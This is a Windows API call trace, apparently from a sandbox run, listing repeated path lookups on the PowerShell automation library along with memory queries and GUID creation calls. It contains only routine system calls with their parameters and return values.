	[0287.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.566] VirtualQuery (in: lpAddress=0x12b520, lpBuffer=0x12c3e0, dwLength=0x30 | out: lpBuffer=0x12c3e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0287.567] VirtualQuery (in: lpAddress=0x12b5b0, lpBuffer=0x12c470, dwLength=0x30 | out: lpBuffer=0x12c470*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0287.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.567] VirtualQuery (in: lpAddress=0x12b7d0, lpBuffer=0x12c690, dwLength=0x30 | out: lpBuffer=0x12c690*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0287.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.568] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xdb98745c, Data2=0x1627, Data3=0x470a, Data4=([0]=0x9f, [1]=0xef, [2]=0xb2, [3]=0x42, [4]=0xd7, [5]=0x69, [6]=0x1e, [7]=0xfb))) returned 0x0
	[0287.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.570] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xd6d4c0ed, Data2=0x1451, Data3=0x4f3e, Data4=([0]=0xaa, [1]=0x60, [2]=0xa9, [3]=0xa7, [4]=0x19, [5]=0x48, [6]=0x21, [7]=0x17))) returned 0x0
	[0287.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.571] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x795e735d, Data2=0xd1d6, Data3=0x4143, Data4=([0]=0x88, [1]=0x56, [2]=0xa9, [3]=0x87, [4]=0x57, [5]=0x60, [6]=0xa5, [7]=0xc4))) returned 0x0
	[0287.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.573] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x835f4fc, Data2=0x18d3, Data3=0x42ed, Data4=([0]=0xb0, [1]=0x1a, [2]=0x6c, [3]=0xa6, [4]=0xb9, [5]=0x5f, [6]=0x11, [7]=0x4c))) returned 0x0
	[0287.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.574] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xe945379, Data2=0x46ac, Data3=0x47b4, Data4=([0]=0xbe, [1]=0x3c, [2]=0xf3, [3]=0xae, [4]=0xe4, [5]=0x8d, [6]=0xa4, [7]=0xc6))) returned 0x0
	[0287.575] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x8dfc6504, Data2=0x1e0f, Data3=0x41fe, Data4=([0]=0x97, [1]=0x13, [2]=0xf3, [3]=0x21, [4]=0xf1, [5]=0x45, [6]=0x8, [7]=0xd6))) returned 0x0
	[0287.575] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xb86d264, Data2=0x4abf, Data3=0x4bf3, Data4=([0]=0xb5, [1]=0xa, [2]=0x2c, [3]=0x3, [4]=0x2d, [5]=0x8a, [6]=0xca, [7]=0xe5))) returned 0x0
	[0287.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.576] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x72a88a18, Data2=0xcfa4, Data3=0x4f1d, Data4=([0]=0x98, [1]=0x1, [2]=0xd5, [3]=0x18, [4]=0x6e, [5]=0x26, [6]=0x3a, [7]=0x53))) returned 0x0
	[0287.577] VirtualQuery (in: lpAddress=0x12b390, lpBuffer=0x12c250, dwLength=0x30 | out: lpBuffer=0x12c250*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.577] VirtualQuery (in: lpAddress=0x12b390, lpBuffer=0x12c250, dwLength=0x30 | out: lpBuffer=0x12c250*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.577] VirtualQuery (in: lpAddress=0x12b420, lpBuffer=0x12c2e0, dwLength=0x30 | out: lpBuffer=0x12c2e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12baa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
